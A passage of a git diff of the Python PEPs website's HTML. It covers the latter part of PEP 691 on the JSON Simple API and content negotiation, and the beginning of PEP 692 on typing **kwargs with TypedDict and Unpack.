  • yanked: An optional key which may be either a boolean to indicate if the +file has been yanked, or a non empty, but otherwise arbitrary, string to indicate +that a file has been yanked with a specific reason. If the yanked key is present +and is a truthy value, then it SHOULD be interpreted as indicating that the +file pointed to by the url field has been “Yanked” as per PEP 592.
  • +
+

As an example:

+
{
+  "meta": {
+    "api-version": "1.0"
+  },
+  "name": "holygrail",
+  "files": [
+    {
+      "filename": "holygrail-1.0.tar.gz",
+      "url": "https://example.com/files/holygrail-1.0.tar.gz",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "yanked": "Had a vulnerability"
+    },
+    {
+      "filename": "holygrail-1.0-py3-none-any.whl",
+      "url": "https://example.com/files/holygrail-1.0-py3-none-any.whl",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "dist-info-metadata": true
+    }
+  ]
+}
+
+
+
+

Note

+

While the files key is an array, and thus is required to be in some kind +of an order, neither PEP 503 nor this PEP requires any specific ordering nor +that the ordering is consistent from one request to the next. Mentally this is +best thought of as a set, but both JSON and HTML lack the functionality to have +sets.

+
+
+
+
+

Content-Types

+

This PEP proposes that all responses from the Simple API will have a standard +content type that describes what the response is (a Simple API response), what +version of the API it represents, and what serialization format has been used.

+

The structure of this content type will be:

+
application/vnd.pypi.simple.$version+format
+
+
+

Since only major versions should be disruptive to clients attempting to +understand one of these API responses, only the major version will be included +in the content type, and will be prefixed with a v to clarify that it is a +version number.

+

Which means that for the existing 1.0 API, the content types would be:

+
    +
  • JSON: application/vnd.pypi.simple.v1+json
  • +
  • HTML: application/vnd.pypi.simple.v1+html
  • +
+

In addition to the above, a special “meta” version named latest is supported, whose purpose is to allow clients to request the absolute latest version without having to know ahead of time what that version is. It is recommended, however, that clients be explicit about what versions they support.

+

To support existing clients which expect the existing PEP 503 API responses to +use the text/html content type, this PEP further defines text/html as an alias +for the application/vnd.pypi.simple.v1+html content type.

+
+
+

Version + Format Selection

+

Now that there are multiple possible serializations, we need a mechanism to allow clients to indicate what serialization formats they’re able to understand. In addition, it would be beneficial if any possible new major version of the API can be added without disrupting existing clients expecting the previous API version.

+

To enable this, this PEP standardizes on the use of HTTP’s +Server-Driven Content Negotiation.

+

While this PEP won’t fully describe the entirety of server-driven content +negotiation, the flow is roughly:

+
    +
  1. The client makes an HTTP request containing an Accept header listing all of the version+format content types that they are able to understand.
  2. The server inspects that header, selects one of the listed content types, then returns a response using that content type (treating the absence of an Accept header as Accept: */*).
  3. If the server does not support any of the content types in the Accept header, then it is able to choose between 3 different options for how to respond:
       a. Select a default content type other than what the client has requested and return a response with that.
       b. Return an HTTP 406 Not Acceptable response to indicate that none of the requested content types were available, and the server was unable or unwilling to select a default content type to respond with.
       c. Return an HTTP 300 Multiple Choices response that contains a list of all of the possible responses that could have been chosen.
  4. The client interprets the response, handling the different types of responses that the server may have responded with.
+

This PEP does not specify which choices the server makes in regards to handling +a content type that it isn’t able to return, and clients SHOULD be prepared +to handle all of the possible responses in whatever way makes the most sense for +that client.

+

However, as there is no standard format for how a 300 Multiple Choices +response can be interpreted, this PEP highly discourages servers from utilizing +that option, as clients will have no way to understand and select a different +content-type to request. In addition, it’s unlikely that the client could +understand a different content type anyways, so at best this response would +likely just be treated the same as a 406 Not Acceptable error.

+

This PEP does require that if the meta version latest is being used, the server MUST respond with the content type for the actual version that is contained in the response (i.e. an Accept: application/vnd.pypi.simple.latest+json request that returns a v1.x response should have a Content-Type of application/vnd.pypi.simple.v1+json).

+

The Accept header is a comma separated list of content types that the client +understands and is able to process. It supports three different formats for each +content type that is being requested:

+
    +
  • $type/$subtype
  • +
  • $type/*
  • +
  • */*
  • +
+

For the use of selecting a version+format, the most useful of these is +$type/$subtype, as that is the only way to actually specify the version +and format you want.

+

The order of the content types listed in the Accept header does not have any +specific meaning, and the server SHOULD consider all of them to be equally +valid to respond with. If a client wishes to specify that they prefer a specific +content type over another, they may use the Accept header’s +quality value +syntax.

+

This allows a client to specify a priority for a specific entry in their +Accept header, by appending a ;q= followed by a value between 0 and +1 inclusive, with up to 3 decimal digits. When interpreting this value, +an entry with a higher quality has priority over an entry with a lower quality, +and any entry without a quality present will default to a quality of 1.

+

However, clients should keep in mind that a server is free to select any of +the content types they’ve asked for, regardless of their requested priority, and +it may even return a content type that they did not ask for.

+

To aid clients in determining the content type of the response that they have received from an API request, this PEP requires that servers always include a Content-Type header indicating the content type of the response. This is technically a backwards incompatible change, however in practice pip has been enforcing this requirement, so the risk of actual breakage is low.

+

An example of how a client can operate would look like:

+
import email.message
+import requests
+
+def parse_content_type(header: str) -> str:
+    m = email.message.Message()
+    m["content-type"] = header
+    return m.get_content_type()
+
+# Construct our list of acceptable content types, we want to prefer
+# that we get a v1 response serialized using JSON, however we also
+# can support a v1 response serialized using HTML. For compatibility
+# we also request text/html, but we prefer it least of all since we
+# don't know if it's actually a Simple API response, or just some
+# random HTML page that we've gotten due to a misconfiguration.
+CONTENT_TYPES = [
+    "application/vnd.pypi.simple.v1+json",
+    "application/vnd.pypi.simple.v1+html;q=0.2",
+    "text/html;q=0.01",  # For legacy compatibility
+]
+ACCEPT = ", ".join(CONTENT_TYPES)
+
+
+# Actually make our request to the API, requesting all of the content
+# types that we find acceptable, and letting the server select one of
+# them out of the list.
+resp = requests.get("https://pypi.org/simple/", headers={"Accept": ACCEPT})
+
+# If the server does not support any of the content types you requested,
+# AND it has chosen to return a HTTP 406 error instead of a default
+# response then this will raise an exception for the 406 error.
+resp.raise_for_status()
+
+
+# Determine what kind of response we've gotten to ensure that it is one
+# that we can support, and if it is, dispatch to a function that will
+# understand how to interpret that particular version+serialization. If
+# we don't understand the content type we've gotten, then we'll raise
+# an exception.
+content_type = parse_content_type(resp.headers.get("content-type", ""))
+match content_type:
+    case "application/vnd.pypi.simple.v1+json":
+        handle_v1_json(resp)
+    case "application/vnd.pypi.simple.v1+html" | "text/html":
+        handle_v1_html(resp)
+    case _:
+        raise Exception(f"Unknown content type: {content_type}")
+
+
+

If a client wishes to only support HTML or only support JSON, then they would +just remove the content types that they do not want from the Accept header, +and turn receiving them into an error.

+
+

Alternative Negotiation Mechanisms

+

While using HTTP’s Content negotiation is considered the standard way for a client +and server to coordinate to ensure that the client is getting an HTTP response that +it is able to understand, there are situations where that mechanism may not be +sufficient. For those cases this PEP has alternative negotiation mechanisms that +may optionally be used instead.

+
+
URL Parameter
+

Servers that implement the Simple API may choose to support a URL parameter named format to allow clients to request a specific version+format of the response.

+

The value of the format parameter should be one of the valid content types. +Passing multiple content types, wild cards, quality values, etc… is not +supported.
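For example (URL illustrative), the JSON serialization of a project page could be requested directly in a browser:

https://pypi.org/simple/holygrail/?format=application/vnd.pypi.simple.v1+json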

+

Supporting this parameter is optional, and clients SHOULD NOT rely on it for +interacting with the API. This negotiation mechanism is intended to allow for easier +human based exploration of the API within a browser, or to allow documentation or +notes to link to a specific version+format.

+

Servers that do not support this parameter may choose to return an error when it is present, or they may simply ignore its presence.

+

When a server does implement this parameter, it SHOULD take precedence over any values in the client’s Accept header, and if the server does not support the requested format, it may choose to fall back to the Accept header, or choose any of the error conditions that standard server-driven content negotiation typically has (e.g. 406 Not Acceptable, 300 Multiple Choices, or selecting a default type to return).

+
+
+
Endpoint Configuration
+

This option technically is not a special option at all; it is just a natural consequence of using content negotiation and allowing servers to select which of the available content types is their default.

+

If a server is unwilling or unable to implement the server-driven content negotiation, +and would instead rather require users to explicitly configure their client to select +the version they want, then that is a supported configuration.

+

To enable this, a server should make multiple endpoints (for instance, +/simple/v1+html/ and/or /simple/v1+json/) for each version+format that they +wish to support. Under that endpoint, they can host a copy of their repository that +only supports one (or a subset) of the content-types. When a client makes a request +using the Accept header, the server can ignore it and return the content type +that corresponds to that endpoint.

+

For clients that wish to require specific configuration, they can keep track of +which version+format a specific repository URL was configured for, and when making +a request to that server, emit an Accept header that only includes the correct +content type.

+
+
+
+
+

TUF Support - PEP 458

+

PEP 458 requires that all API responses are hashable and that they can be uniquely +identified by a path relative to the repository root. For a Simple API repository, the +target path is the Root of our API (e.g. /simple/ on PyPI). This creates +challenges when accessing the API using a TUF client instead of directly using a +standard HTTP client, as the TUF client cannot handle the fact that a target could +have multiple different representations that all hash differently.

+

PEP 458 does not specify what the target path should be for the Simple API, but +TUF requires that the target paths be “file-like”, in other words, a path like +simple/PROJECT/ is not acceptable, because it technically points to a +directory.

+

The saving grace is that the target path does not have to actually match the URL +being fetched from the Simple API, and it can just be a sigil that the fetching code +knows how to transform into the actual URL that needs to be fetched. This same thing +can hold true for other aspects of the actual HTTP request, such as the Accept +header.

+

Ultimately figuring out how to map a directory to a filename is out of scope for this +PEP (but it would be in scope for PEP 458), and this PEP defers making a decision +about how exactly to represent this inside of PEP 458 metadata.

+

However, it appears that the current WIP branch against pip that attempts to implement +PEP 458 is using a target path like simple/PROJECT/index.html. This could be +modified to include the API version and serialization format using something like +simple/PROJECT/vnd.pypi.simple.vN.FORMAT. So the v1 HTML format would be +simple/PROJECT/vnd.pypi.simple.v1.html and the v1 JSON format would be +simple/PROJECT/vnd.pypi.simple.v1.json.

+

In this case, since text/html is an alias to application/vnd.pypi.simple.v1+html +when interacting through TUF, it likely will make the most sense to normalize to the +more explicit name.

+

Likewise the latest metaversion should not be included in the targets, only +explicitly declared versions should be supported.

+
+
+
+

Recommendations

+

This section is non-normative, and represents what the PEP authors believe to be +the best default implementation decisions for something implementing this PEP, but +it does not represent any sort of requirement to match these decisions.

+

These decisions have been chosen to maximize the number of requests that can be moved onto the newest version of the API, while maintaining the greatest amount of compatibility. In addition, they try to give the API guardrails that push clients toward making the best choices they can.

+

It is recommended that servers:

+
    +
  • Support all 3 content types described in this PEP, using server-driven content negotiation, for as long as they reasonably can, or at least as long as they’re receiving non-trivial traffic that uses the HTML responses.
  • +
  • When encountering an Accept header that does not contain any content types that it knows how to work with, the server should not ever return a 300 Multiple Choices response, and should instead return a 406 Not Acceptable response.
      +
    • However, if choosing to use the endpoint configuration, you should prefer to +return a 200 OK response in the expected content type for that endpoint.
    • +
    +
  • +
  • When selecting an acceptable version, the server should choose the highest version +that the client supports, with the most expressive/featureful serialization format, +taking into account the specificity of the client requests as well as any +quality priority values they have expressed, and it should only use the +text/html content type as a last resort.
  • +
+

It is recommended that clients:

+
    +
  • Support all 3 content types described in this PEP, using server-driven +content negotiation, for as long as they reasonably can.
  • +
  • When constructing an Accept header, include all of the content types +that you support.

    You should generally not include a quality priority value for your content +types, unless you have implementation specific reasons that you want the +server to take into account (for example, if you’re using the standard library +HTML parser and you’re worried that there may be some kinds of HTML responses +that you’re unable to parse in some edge cases).

    +

    The one exception to this recommendation is that it is recommended that you +should include a ;q=0.01 value on the legacy text/html content type, +unless it is the only content type that you are requesting.

    +
  • +
  • Explicitly select what versions they are looking for, rather than using the +latest meta version during normal operation.
  • +
  • Check the Content-Type of the response and ensure it matches something +that you were expecting.
  • +
+
+
+

FAQ

+
+

Does this mean PyPI is planning to drop support for HTML/PEP 503?

+

No, PyPI has no plans at this time to drop support for PEP 503 or HTML +responses.

+

While this PEP does give repositories the flexibility to do that, that flexibility largely exists to ensure that things like the Endpoint Configuration mechanism are able to work, and to ensure that clients do not make any assumptions that would prevent gracefully dropping support for HTML at some point in the future.

+

The existing HTML responses incur almost no maintenance burden on PyPI and +there is no pressing need to remove them. The only real benefit to dropping them +would be to reduce the number of items cached in our CDN.

+

If in the future PyPI does wish to drop support for them, doing so would +almost certainly be the topic of a PEP, or at a minimum a public, open, discussion +and would be informed by metrics showing any impact to end users.

+
+
+

Why JSON instead of X format?

+

JSON parsers are widely available in most, if not every, language. A JSON +parser is also available in the Python standard library. It’s not the perfect +format, but it’s good enough.

+
+
+

Why not add X feature?

+

The general goal of this PEP is to change or add very little. We will instead focus +largely on translating the existing information contained within our HTML responses +into a sensible JSON representation. This will include PEP 658 metadata required +for packaging tooling.

+

The only real new capability that is added in this PEP is the ability to have +multiple hashes for a single file. That was done because the current mechanism being +limited to a single hash has made it painful in the past to migrate hashes +(md5 to sha256) and the cost of making the hashes a dictionary and allowing multiple +is pretty low.

+

The API was generally designed to allow further extension through adding new keys, +so if there’s some new piece of data that an installer might need, future PEPs can +easily make that available.

+
+
+

Why include the filename when the URL has it already?

+

We could reduce the size of our responses by removing the filename key and expecting +clients to pull that information out of the URL.

+

Currently this PEP chooses not to do that, largely because PEP 503 explicitly required +that the filename be available via the anchor tag of the links, though that was largely +because something had to be there. It’s not clear if repositories in the wild always +have a filename as the last part of the URL or if they’re relying on the filename in the +anchor tag.

+

It also makes the responses slightly nicer to read for a human, as you get a nice short +unique identifier.

+

If we gained reasonable confidence that the filename can be mandated to be in the URL, then we could drop this data and reduce the size of the JSON response.

+
+
+

Why not break out other pieces of information from the filename?

+

Currently clients are expected to parse a number of pieces of information from the +filename such as project name, version, ABI tags, etc. We could break these out +and add them as keys to the file object.

+

This PEP has chosen not to do that because doing so would increase the size of the +API responses, and most clients are going to require the ability to parse that +information out of file names anyways regardless of what the API does. Thus it makes +sense to keep that functionality inside of the clients.

+
+
+

Why Content Negotiation instead of multiple URLs?

+

Another reasonable way to implement this would be to duplicate the API routes and +include some marker in the URL itself for JSON. Such as making the URLs be something +like /simple/foo.json, /simple/_index.json, etc.

+

This makes some things simpler like TUF integration and fully static serving of a +repository (since .json files can just be written out).

+

However, this approach has three pretty major issues:

+
    +
  • Our current URL structure relies on the fact that there is an URL that represents +the “root”, / to serve the list of projects. If we want to have separate URLs +for JSON and HTML, we would need to come up with some way to have two root URLs.

    Something like / being HTML and /_index.json being JSON, since _index +isn’t a valid project name could work. But / being HTML doesn’t work great if +a repository wants to remove support for HTML.

    +

    Another option could be moving all of the existing HTML URLs under a namespace while +making a new namespace for JSON. Since /<project>/ was defined, we would have to +make these namespaces not valid project names, so something like /_html/ and +/_json/ could work, then just redirect the non namespaced URLs to whatever the +“default” for that repository is (likely HTML, unless they’ve disabled HTML then JSON).

    +
  • +
  • With separate URLs, there’s no good way to support zero configuration discovery +that a repository supports the JSON URLs without making additional HTTP requests to +determine if the JSON URL exists or not.

The most naive implementation of this would be to request the JSON URL and fall back to the HTML URL for every single request, but that would perform horribly and would violate the goal of minimal additional HTTP requests.

    +

    The most likely implementation of this would be to make some sort of repository level +configuration file that somehow indicates what is supported. We would have the same +namespace problem as above, with the same solution: something like /_config.json +could hold that data, and a client could first make an HTTP request to that, +and if it exists, pull it down and parse it to learn about the capabilities of this +particular repository.

    +
  • +
  • The use of Accept also allows us to add versioning into this field, which +separate URLs would not support as cleanly.
  • +
+

All being said, it is the opinion of this PEP that those three issues combined make +using separate API routes a less desirable solution than relying on content +negotiation to select the most ideal representation of the data.

+
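
For a sense of what the chosen approach looks like from the client side, a minimal +sketch (the repository URL is hypothetical):

+
import json
+import urllib.request
+
+request = urllib.request.Request(
+    "https://repository.example.com/simple/foo/",
+    headers={"Accept": "application/vnd.pypi.simple.v1+json"},
+)
+with urllib.request.urlopen(request) as response:
+    # A conforming server answers with the concrete content type it selected.
+    assert response.headers["Content-Type"] == "application/vnd.pypi.simple.v1+json"
+    project = json.load(response)
+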
+
+

Does this mean that static servers are no longer supported?

+

In short, no, static servers are still (almost) fully supported by this PEP.

+

The specifics of how they are supported will depend on the static server in +question. For example:

+
    +
  • S3: S3 fully supports custom content types, however it does not support +any form of content negotiation. In order to have a server hosted on S3, you +would have to use the “Endpoint configuration” style of negotiation, and +users would have to configure their clients explicitly.
  • +
  • GitHub Pages: GitHub Pages does not support custom content types, so the +S3 solution is not currently workable, which means that only text/html +repositories would function.
  • +
  • Apache: Apache fully supports server-driven content negotiation, and would +just need to be configured to map the custom content types to specific extensions.
  • +
+
+
+

Why not add an application/json alias like text/html?

+

This PEP believes that it is best for both clients and servers to be explicit +about the types of the API responses that are being used, and a content type +like application/json is the exact opposite of explicit.

+

The text/html alias exists as a compromise, primarily to +ensure that existing consumers of the API continue to function as they already +do. There is no such expectation for existing clients using the Simple API with +an application/json content type.

+

In addition, application/json has no versioning in it, which means that +if there is ever a 2.x version of the Simple API, we will be forced to make +a decision. Should application/json preserve backwards compatibility and +continue to be an alias for application/vnd.pypi.simple.v1+json, or should +it be updated to be an alias for application/vnd.pypi.simple.v2+json?

+

This problem doesn’t exist for text/html, because the assumption is that +HTML will remain a legacy format, and will likely not gain any new features, +much less features that require breaking compatibility. So having it be an +alias for application/vnd.pypi.simple.v1+html is effectively the same as +having it be an alias for application/vnd.pypi.simple.latest+html, since +1.x will likely be the only HTML version to exist.

+

The largest benefit to adding the application/json content type is that +there are some tools that do not allow you to have custom content types, and require +you to select one of their preset content types. The main example of this is +GitHub Pages, where the lack of application/json support in this PEP means +that static repositories will no longer be able to be hosted on GitHub Pages +unless GitHub adds the application/vnd.pypi.simple.v1+json content type.

+

This PEP believes that the benefits are not large enough to add that content +type alias at this time, and that its inclusion would likely be a footgun +waiting for unsuspecting people to accidentally pick it up. Especially given +that we can always add it in the future, but removing things is a lot harder +to do.

+
+
+

Why add an application/vnd.pypi.simple.v1+html?

+

The PEP expects the HTML version of the API to become legacy, so one option it +could take is to not add the application/vnd.pypi.simple.v1+html content type +and just use text/html for that.

+

This PEP has decided that adding the new content type is better overall, since it +makes even the legacy format more self-describing and makes the two formats more +consistent with each other. Overall I think it’s more confusing if the +html version +doesn’t exist.

+
+
+

Why v1.0 and not v1.1 or v2.0?

+

This PEP is still wholly backwards compatible: clients that could read the +existing v1.0 API can continue to read the API after these changes have +been made. In PEP 629, the qualification for a major version bump is:

+
+
Incrementing the major version is used to signal a backwards incompatible +change such that existing clients would no longer be expected to be able to +meaningfully use the API.
+

The changes in this PEP do not meet that bar; nothing has changed in a way that +existing clients would no longer be expected to be able to meaningfully use the +API.

+

That means we should still be within the v1.x version line.

+

The question of whether we should be v1.1 or v1.0 is a more interesting one, and +there are a few ways of looking at it:

+
    +
  • We’ve exposed new features to the API (the project name on the project +page, multiple hashes), which is a sign that we should increment the minor +version.
  • +
  • The new features exist wholly within the JSON serialization, which means that +no client that currently is requesting the HTML 1.0 page, would ever see any +of the new features anyways, so for them it is effectively still v1.0.
  • +
  • No major client has implemented support for PEP 629 yet, which means that the +minor version numbering is largely academic at this point anyways, since it +exists to let clients provide feedback to end users.
  • +
+

The second and third points above end up making the first point kind of +meaningless, and with that, it makes more sense to just call everything v1.0 +and be stricter about updating versions into the future.

+
+
+
+

Appendix 1: Survey of use cases to cover

+

This was done through a discussion between pip, PyPI, and bandersnatch +maintainers, who are the first two potential users for the new API. This is +how they use the Simple + JSON APIs today, or how they currently plan to use them:

+
    +
  • pip:
      +
    • List of all files for a particular release
    • +
    • Metadata of each individual artifact:
        +
      • was it yanked? (data-yanked)
      • +
      • what’s the python-requires? (data-python-requires)
      • +
      • what’s the hash of this file? (currently, hash in URL)
      • +
      • Full metadata (data-dist-info-metadata)
      • +
      • [Bonus] what are the declared dependencies, if available (list-of-strings, null if unavailable)?
      • +
      +
    • +
    +
  • +
  • bandersnatch - Only uses legacy JSON API + XMLRPC today:
      +
    • Generates Simple HTML rather than copying from PyPI
        +
      • Maybe this changes with the new API and we verbatim pull these API assets from PyPI
      • +
      +
    • +
    • List of all files for a particular release.
        +
      • Work out URLs for release files to download
      • +
      +
    • +
    • Metadata of each individual artifact.
        +
      • Write out the JSON to mirror storage today (disk/S3)
          +
        • Required metadata used +(via Package class):
            +
          • metadata["info"]
          • +
          • metadata["last_serial"]
          • +
          • metadata["releases"]
              +
            • digests
            • +
            • URL
            • +
            +
          • +
          +
        • +
        +
      • +
      +
    • +
    • XML-RPC calls (we’d love to deprecate - but we don’t think should go in the Simple API)
        +
      • [Bonus] Get packages since serial X (or all)
          +
        • XML-RPC Call: changelog_since_serial
        • +
        +
      • +
      • [Bonus] Get all packages with serial
          +
        • XML-RPC Call: list_packages_with_serial
        • +
        +
      • +
      +
    • +
    +
  • +
+
+
+

Appendix 2: Rough Underlying Data Models

+

These are not intended to perfectly match the server, client, or wire +formats. Rather, these are conceptual models, put to code to make them +more explicit as to the abstract models underlying the repository API +as it evolved through PEP 503, PEP 592, PEP 629, PEP 658, +and now this PEP, PEP 691.

+

The existing HTML, and the new JSON serialization of these models then +represent how these underlying conceptual models get mapped onto the +actual wire formats.

+

How servers or clients choose to model this data is out of scope for +this PEP.

+
@dataclass
+class Meta:
+    api_version: Literal["1.0"]
+
+
+@dataclass
+class Project:
+    # Normalized or Non-Normalized Name
+    name: str
+    # Computed in JSON, Included in HTML
+    url: str | None
+
+
+@dataclass
+class File:
+    filename: str
+    url: str
+    # Limited to a len() of 1 in HTML
+    hashes: dict[str, str]
+    gpg_sig: bool | None
+    requires_python: str | None
+
+
+@dataclass
+class PEP592File(File):
+    yanked: bool | str
+
+@dataclass
+class PEP658File(PEP592File):
+    # Limited to a len() of 1 in HTML
+    dist_info_metadata: bool | dict[str, str]
+
+
+# Simple Index page (/simple/)
+@dataclass
+class PEP503_Index:
+    projects: set[Project]
+
+
+@dataclass
+class PEP629_Index(PEP503_Index):
+    meta: Meta
+
+
+@dataclass
+class Index(PEP629_Index):
+    pass
+
+
+# Simple Detail page (/simple/$PROJECT/)
+@dataclass
+class PEP503_Detail:
+    files: set[File]
+
+
+@dataclass
+class PEP592_Detail(PEP503_Detail):
+    files: set[PEP592File]
+
+
+@dataclass
+class PEP629_Detail(PEP592_Detail):
+    meta: Meta
+
+
+@dataclass
+class PEP658_Detail(PEP629_Detail):
+    files: set[PEP658File]
+
+
+@dataclass
+class PEP691_Detail(PEP658_Detail):
+    name: str  # Normalized Name
+
+
+@dataclass
+class Detail(PEP691_Detail):
+    pass
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0691.rst

+

Last modified: 2024-10-31 07:02:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0692/index.html b/pep-0692/index.html new file mode 100644 index 00000000000..0f86a5aced3 --- /dev/null +++ b/pep-0692/index.html @@ -0,0 +1,698 @@ + + + + + + + + PEP 692 – Using TypedDict for more precise **kwargs typing | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 692 – Using TypedDict for more precise **kwargs typing

+
+
Author:
+
Franek Magiera <framagie at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
29-May-2022
+
Python-Version:
+
3.12
+
Post-History:
+
29-May-2022, +12-Jul-2022, +12-Jul-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Unpack for keyword arguments for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

Currently **kwargs can be type hinted as long as all of the keyword +arguments specified by them are of the same type. However, that behaviour can +be very limiting. Therefore, in this PEP we propose a new way to enable more +precise **kwargs typing. The new approach revolves around using +TypedDict to type **kwargs that comprise keyword arguments of different +types.

+
+
+

Motivation

+

Currently annotating **kwargs with a type T means that the kwargs +type is in fact dict[str, T]. For example:

+
def foo(**kwargs: str) -> None: ...
+
+
+

means that all keyword arguments in foo are strings (i.e., kwargs is +of type dict[str, str]). This behaviour limits the ability to type +annotate **kwargs only to the cases where all of them are of the same type. +However, it is often the case that keyword arguments conveyed by **kwargs +have different types that are dependent on the keyword’s name. In those cases +type annotating **kwargs is not possible. This is especially a problem for +already existing codebases where the need of refactoring the code in order to +introduce proper type annotations may be considered not worth the effort. This +in turn prevents the project from getting all of the benefits that type hinting +can provide.

+

Moreover, **kwargs can be used to reduce the amount of code needed in +cases when there is a top-level function that is a part of a public API and it +calls a bunch of helper functions, all of which expect the same keyword +arguments. Unfortunately, if those helper functions were to use **kwargs, +there is no way to properly type hint them if the keyword arguments they expect +are of different types. In addition, even if the keyword arguments are of the +same type, there is no way to check whether the function is being called with +keyword names that it actually expects.

+
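
As a sketch of how the proposal described later in this PEP addresses that duplication +(all names here are hypothetical), a single TypedDict can describe the keyword +arguments shared by a public function and its helpers:

+
from typing import TypedDict, Unpack  # typing.Unpack requires Python 3.11+
+
+class RenderOptions(TypedDict):
+    width: int
+    height: int
+
+def render(**kwargs: Unpack[RenderOptions]) -> None:
+    _render_header(**kwargs)
+    _render_body(**kwargs)
+
+def _render_header(**kwargs: Unpack[RenderOptions]) -> None: ...
+def _render_body(**kwargs: Unpack[RenderOptions]) -> None: ...
+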

As described in the Intended Usage section, +using **kwargs is not always the best tool for the job. Despite that, it is +still a widely used pattern. As a consequence, there has been a lot of +discussion around supporting more precise **kwargs typing and it became a +feature that would be valuable for a large part of the Python community. This +is best illustrated by the mypy GitHub issue 4441 which +contains a lot of real world cases that could benefit from this proposal.

+

One more use case worth mentioning for which **kwargs are also convenient +is when a function should accommodate optional keyword-only arguments that +don’t have default values. A need for a pattern like that can arise when values +that are usually used as defaults to indicate no user input, such as None, +can be passed in by a user and should result in a valid, non-default behavior. +For example, this issue came up in the popular httpx library.

+
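
A sketch of that pattern using the proposal described below (hypothetical names; +NotRequired is covered later in this PEP):

+
from typing import NotRequired, TypedDict, Unpack  # Python 3.11+
+
+class RequestOptions(TypedDict):
+    timeout: NotRequired[float | None]
+
+def request(url: str, **options: Unpack[RequestOptions]) -> None:
+    if "timeout" in options:
+        # Distinguishes an explicitly passed None from "not passed at all".
+        print("user supplied timeout:", options["timeout"])
+    else:
+        print("no timeout given; fall back to the library default")
+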
+
+

Rationale

+

PEP 589 introduced the TypedDict type constructor that supports dictionary +types consisting of string keys and values of potentially different types. A +function’s keyword arguments represented by a formal parameter that begins with +double asterisk, such as **kwargs, are received as a dictionary. +Additionally, such functions are often called using unpacked dictionaries to +provide keyword arguments. This makes TypedDict a perfect candidate to be +used for more precise **kwargs typing. In addition, with TypedDict +keyword names can be taken into account during static type analysis. However, +specifying **kwargs type with a TypedDict means, as mentioned earlier, +that each keyword argument specified by **kwargs is a TypedDict itself. +For instance:

+
class Movie(TypedDict):
+    name: str
+    year: int
+
+def foo(**kwargs: Movie) -> None: ...
+
+
+

means that each keyword argument in foo is itself a Movie dictionary +that has a name key with a string type value and a year key with an +integer type value. Therefore, in order to support specifying kwargs type +as a TypedDict without breaking current behaviour, a new construct has to +be introduced.

+

To support this use case, we propose reusing Unpack which +was initially introduced in PEP 646. There are several reasons for doing so:

+
    +
  • Its name is quite suitable and intuitive for the **kwargs typing use case +as our intention is to “unpack” the keywords arguments from the supplied +TypedDict.
  • +
  • The current way of typing *args would be extended to **kwargs +and those are supposed to behave similarly.
  • +
  • There would be no need to introduce any new special forms.
  • +
  • The use of Unpack for the purposes described in this PEP does not +interfere with the use cases described in PEP 646.
  • +
+
+
+

Specification

+

With Unpack we introduce a new way of annotating **kwargs. +Continuing the previous example:

+
def foo(**kwargs: Unpack[Movie]) -> None: ...
+
+
+

would mean that the **kwargs comprise two keyword arguments specified by +Movie (i.e. a name keyword of type str and a year keyword of +type int). This indicates that the function should be called as follows:

+
kwargs: Movie = {"name": "Life of Brian", "year": 1979}
+
+foo(**kwargs)                               # OK!
+foo(name="The Meaning of Life", year=1983)  # OK!
+
+
+

When Unpack is used, type checkers treat kwargs inside the +function body as a TypedDict:

+
def foo(**kwargs: Unpack[Movie]) -> None:
+    assert_type(kwargs, Movie)  # OK!
+
+
+

Using the new annotation will not have any runtime effect - it should only be +taken into account by type checkers. Any mention of errors in the following +sections relates to type checker errors.

+
+

Function calls with standard dictionaries

+

Passing a dictionary of type dict[str, object] as a **kwargs argument +to a function that has **kwargs annotated with Unpack must generate a +type checker error. On the other hand, the behaviour for functions using +standard, untyped dictionaries can depend on the type checker. For example:

+
def foo(**kwargs: Unpack[Movie]) -> None: ...
+
+movie: dict[str, object] = {"name": "Life of Brian", "year": 1979}
+foo(**movie)  # WRONG! Movie is of type dict[str, object]
+
+typed_movie: Movie = {"name": "The Meaning of Life", "year": 1983}
+foo(**typed_movie)  # OK!
+
+another_movie = {"name": "Life of Brian", "year": 1979}
+foo(**another_movie)  # Depends on the type checker.
+
+
+
+
+

Keyword collisions

+

A TypedDict that is used to type **kwargs could potentially contain +keys that are already defined in the function’s signature. If the duplicate +name is a standard parameter, an error should be reported by type checkers. +If the duplicate name is a positional-only parameter, no errors should be +generated. For example:

+
def foo(name, **kwargs: Unpack[Movie]) -> None: ...     # WRONG! "name" will
+                                                        # always bind to the
+                                                        # first parameter.
+
+def foo(name, /, **kwargs: Unpack[Movie]) -> None: ...  # OK! "name" is a
+                                                        # positional-only parameter,
+                                                        # so **kwargs can contain
+                                                        # a "name" keyword.
+
+
+
+
+

Required and non-required keys

+

By default all keys in a TypedDict are required. This behaviour can be +overridden by setting the dictionary’s total parameter to False. +Moreover, PEP 655 introduced new type qualifiers - typing.Required and +typing.NotRequired - that enable specifying whether a particular key is +required or not:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+
+

When using a TypedDict to type **kwargs all of the required and +non-required keys should correspond to required and non-required function +keyword parameters. Therefore, if a required key is not provided by the +caller, then an error must be reported by type checkers.

+
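
Continuing the Movie example above, a sketch of the resulting calling convention:

+
def foo(**kwargs: Unpack[Movie]) -> None: ...
+
+foo(title="Life of Brian")             # OK! "year" is not required.
+foo(title="Life of Brian", year=1979)  # OK!
+foo(year=1979)                         # WRONG! "title" is required.
+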
+
+

Assignment

+

Assignments of a function typed with **kwargs: Unpack[Movie] and +another callable type should pass type checking only if they are compatible. +This can happen for the scenarios described below.

+
+

Source and destination contain **kwargs

+

